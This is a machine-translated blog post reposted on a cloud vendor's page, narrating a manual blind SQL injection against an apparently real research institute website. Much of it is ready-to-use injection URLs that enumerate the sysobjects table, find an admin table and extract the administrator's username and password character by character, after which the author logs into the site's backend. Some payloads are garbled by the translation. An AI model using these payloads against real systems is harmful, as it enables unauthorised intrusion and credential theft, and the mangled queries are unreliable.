Manual database injection for a website Security Detection

Source: Internet
Author: User

I. Introduction

Long night slowly, no mood to sleep ......

Inadvertently turning to a rock song called the shadows of the ancestors that I heard a few years ago, such a long history is a mixture of many sins and achievements; such a "splendid culture ", there are too many ignorance and civilization. Beautiful, such as Chinese characters, go Guzheng, and poetry and Song Fu; poor, for example, they will only do what they want to do in their life: "destroy the thief, take the throne, and select the princess, the emperor and the bureaucracy of the four things, the footfall, the eunuch and the eight-stock articles, etc.

Oh, it's not too slow! Today, let me use an old bottle of 8 shares to pack new IT wine, inject the database into this security technology that has been around for several years, and write a slightly new article.

 

Ii. Overview

The so-called database Injection, that is, SQL Injection, means that attackers insert SQL commands into the input fields of Web forms or query strings of page requests, and fool the server to execute malicious SQL commands. The official saying is: "When an application uses the input content to construct dynamic SQL statements to access the database, SQL injection attacks will occur. If the Code uses stored procedures, which are passed as strings containing unfiltered user input, SQL injection attacks will also occur. SQL injection may allow attackers to log on to the database using applications to execute commands. If an application uses a privileged account to connect to the database, this problem becomes very serious ." In some forms, the content entered by users is directly used to construct (or affect) dynamic SQL commands or as input parameters of stored procedures. Such forms are particularly vulnerable to SQL injection attacks. Many website programs do not judge the validity of user input data or improperly process the variables in the program, which poses security risks to the application. In this way, you can submit a piece of database query code (usually in the address bar of a browser and access through the normal www port) to obtain sensitive information or control the entire server according to the results returned by the program, therefore, SQL injection is generated. To put it simply, the principle of SQL injection is to submit special code from the client, so as to collect information about programs and servers and obtain the information you think.

Of course, what kind of database query code can be constructed and constructed is the difference between cainiao and experts. At the same time, I assure everyone: i'm never a master-I basically don't even use databases, so after reading the article, don't ask me too many questions, because I don't know.

 

Iii. Detection

In the process of searching for information, I was linked to a website of a telecommunications technology research institute. I checked the homepage code and link and tested it with and or. I didn't find anything, at the end of the day, I found the following page interesting.

1 = 1 (abnormal)

1 = 2 (not normal)

Add a special symbol, as shown in.

 

(Return normal)

 

(Return exception)

Hey, there is an injection, and my heart is shining!

 

Iv. Violent Database

We can see that the background database of this website is ms SQL Server.

 

(Select count (*) from [sysobjects])> = 0 (the returned result is normal. It can be seen that the database is SQL Server)

I am lucky to be able to detect the database instance name of this website. Please refer.

 

In SQL Server, the maximum value of DB_NAME is NVARCHAR (128). When I submit an error and the website reports an error, check the red underline and red rectangle. The database instance name is jstrd.

 

V. Table searching
It was a long and painful task. At the same time, when creating a database, the system automatically creates some system tables. I constructed the following statements, to test the table name in the database instance jstrd.

Due to space limitations, I will only introduce a system table (SYSOBJECTS) related to the application instance and its related fields here.

Table SYSOBJECTS creates a record for each object (constraints, rules, tables, views, triggers, etc.) created in the database. The meanings of related fields in the table are as follows:

SYSOBJECTS. name indicates the object name, for example, table name and view name.

The id of the SYSOBJECTS. id object.

SYSOBJECTS. type object type (p stored procedure, v view, s system table, u User table ).

 

The returned result is correct. The "system state" Statement submitted is:

Http: // */show_products.asp? Id = 22% 27% 20and % 20% 28 Select % 20 count % 28% 2a % 29% 20 from % 20jstrd .. % 5 bsysobjects % 5d % 20 where % 20 xtype = char % 28117% 29% 20and % 20 left % 28jstrd .. % 5 bsysobjects % 5d. name % 2c0% 29 = char % 2832% 29% 20and % 20len % 28jstrd .. % 5 bsysobjects % 5d. name % 29% 3e0% 29% 3e0% 20and % 20% 27 = % 271% & classid = 1

Translated into the "user State" that we can easily identify (which will be expressed in this form later:

Http: // */show_products.asp? Id = 22 'and (Select count (*) From jstrd .. [sysobjects] where xtype = char (117) and left (jstrd .. [sysobjects]. name, 0) = char (32) and len (jstrd .. [sysobjects]. name)> 0 and abs (ascii (substring (jstrd .. [sysobjects]. name, 1, 1) <= 67)> 0 and '1' = '1 & classid = 1

Maybe you have to worry about it. What is this? It's a mess? I smiled and did not answer the question. The answer will be answered later. But click here in advance:

Xtype is a field in the Table. xtype = char (117), that is, xtype = 'U', indicates that the user's table is used. The ASCII code of Space is 32.

After several failures, I found a table that I thought was used to store the user name and password when entering the following statement (other tables were also detected before, but I think it is useless to myself. What I want to talk about is that after I detects that there is tbglad, I directly think that TblAdmin has been added; later I found that TblAdminUs has been added, and TblAdminUser has been added ).

 

Http: // */show_products.asp? Id = 22 'and (Select count (*) From jstrd .. [sysobjects] where xtype = char (117) and left (jstrd .. [sysobjects]. name, 11) = CHAR (84) + CHAR (98) + CHAR (108) + CHAR (65) + CHAR (100) + CHAR (109) + CHAR (105) + CHAR (110) + CHAR (85) + CHAR (115) + CHAR (101) and len (jstrd .. [sysobjects]. name)> 11 and abs (ascii (substring (jstrd .. [sysobjects]. name, 114) =)> 0 and '1' = '1 & classid = 1

We can see that there is a table like TblAdminUser, so we can test it again, for example.

 

And (select count (*) from TblAdminUser)> 0

 

6. Exploring Columns
As you can see, the above answers are likely to be clear. What else do you not understand! Well, I will tell you that the website and background system will ignore the "system state" that I mentioned above and will ignore "User State ". Let's look at the two tables below.

 

(Some Unicode encoding tables)

 

(Part of the ASCII code table)

I found the table just now. Our job is to explore the columns. Using the Knowledge mentioned above, I guess there should be two columns: username and password! See.

Http: // */show_products.asp? Id = 22 'and (Select count (*) from jstrd .. [TblAdminUser] where left (jstrd .. [TblAdminUser]. username, 0) = char (32) and len (jstrd .. [TblAdminUser]. username)> 0)> 0 and '1' = '1 & classid = 1

 

Http://www.bkjia.com/show_products.asp? Id = 22 'and (Select count (*) From jstrd .. [TblAdminUser] where left (jstrd .. [TblAdminUser]. password, 0) = char (32) and len (jstrd .. [TblAdminUser]. password)> 0 and abs (ascii (substring (jstrd .. [TblAdminUser]. password, 106) =)> 0 and '1' = '1 & classid = 1

 

VII. Results
The horn of the charge has sounded, and the victory is in sight; but "A hundred miles, half a ninety", the place that really needs to spend more than half of the effort is also here.

 

Http: // */show_products.asp? Id = 22 '% 20and % 20 (Select % 20 count (*) % 20 From % 20jstrd .. [TblAdminUser] % 20 where % 20% 20 left (jstrd .. [TblAdminUser]. username, 0) = char (32) % 20and % 20len (jstrd .. [TblAdminUser]. username)> 0% 20and % 20abs (ascii (substring (jstrd .. [TblAdminUser]. username, 0%) = 97)> 20and % 20 '1' = '1 & classid = 1

It can be seen that the first character in the username column is a (ASCII code 97). Soon I guess it is admin.

In the password column, the first character should be behind g, as shown in.

 

Http: // */show_products.asp? Id = 22 '(Select count (*) From jstrd .. [TblAdminUser] where left (jstrd .. [TblAdminUser]. password, 0) = char (32) and len (jstrd .. [TblAdminUser]. password)> 0 and abs (ascii (substring (jstrd .. [TblAdminUser]. password, 103)> 0 and '1' = '1 & classid = 1and

Soon, I guess it's j. As shown in.

 

Http: // */show_products.asp? Id = 22 'and (Select count (*) From jstrd .. [TblAdminUser] where left (jstrd .. [TblAdminUser]. password, 0) = char (32) and len (jstrd .. [TblAdminUser]. password)> 0 and abs (ascii (substring (jstrd .. [TblAdminUser]. password, 106) =)> 0 and '1' = '1 & classid = 1
After a great deal of hard work, I finally found all the passwords, which turned out to be *********

It's easy to find the background and log on to it. It's correct! As shown in.

 

 

VIII. Conclusion
This document focuses on manual database injection, so further penetration after successful website control is not described. Here, I threw a piece of broken bricks to attract everyone to gain more. In my personal sense, injection can be successful, thanks to the following three points:

1. Unicode and ASCII encoding applications;

2. the system automatically creates the sysobjects application;

3. applications with a maximum length of 128 in db_name, and some intuitive judgment.

The whole process took nearly one week's spare time. It was another night ......

Sleep

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.